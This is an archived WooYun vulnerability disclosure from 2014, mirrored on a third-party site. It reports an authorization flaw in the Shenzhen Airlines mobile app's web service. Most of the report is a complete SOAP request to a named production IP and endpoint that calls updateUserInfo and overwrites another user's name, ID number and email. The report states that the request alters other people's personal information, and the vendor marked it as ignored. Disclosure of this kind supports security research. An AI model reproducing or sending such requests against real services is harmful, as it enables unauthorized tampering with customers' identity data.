乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-16: 细节已通知厂商并且等待厂商处理中 2014-06-21: 厂商已经主动忽略漏洞,细节向公众公开
深圳航空APP越权修改信息
http://110.76.39.112:8080/szairmiddle/webservice.ws
<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:IwebServiceFilterProxy="http://filterWebservice.iss.com"> <soap:Body> <IwebServiceFilterProxy:filterProxyForws> <IwebServiceFilterProxy:in0> <xsd:anyType xsi:type="xsd:string">UID201406161148XXXXXX</xsd:anyType> <xsd:anyType xsi:type="xsd:string">李莉</xsd:anyType> <xsd:anyType xsi:type="xsd:string">1</xsd:anyType> <xsd:anyType xsi:type="xsd:string">341100000000000000</xsd:anyType> <xsd:anyType xsi:type="xsd:string">[email protected]</xsd:anyType> <xsd:anyType xsi:type="xsd:string"/> <xsd:anyType xsi:type="xsd:string"/> <xsd:anyType xsi:type="xsd:string"/> <xsd:anyType xsi:type="xsd:string"/> <xsd:anyType xsi:type="xsd:string">2</xsd:anyType> <xsd:anyType xsi:type="xsd:string">test</xsd:anyType> <xsd:anyType xsi:type="xsd:string">test</xsd:anyType> <xsd:anyType xsi:type="xsd:string">SwlPfg4jmSxwS/Po5uwbNYP7jZNhfqc/Fre3DI5Uja8=</xsd:anyType> <xsd:anyType xsi:type="xsd:string">szairmobile</xsd:anyType> <xsd:anyType xsi:type="xsd:string">updateUserInfo</xsd:anyType> </IwebServiceFilterProxy:in0> </IwebServiceFilterProxy:filterProxyForws> </soap:Body></soap:Envelope>
执行请求后,他人的个人信息,包括身份证之类的就会修改。
判断权限
危害等级:无影响厂商忽略
忽略时间:2014-06-21 23:12
暂无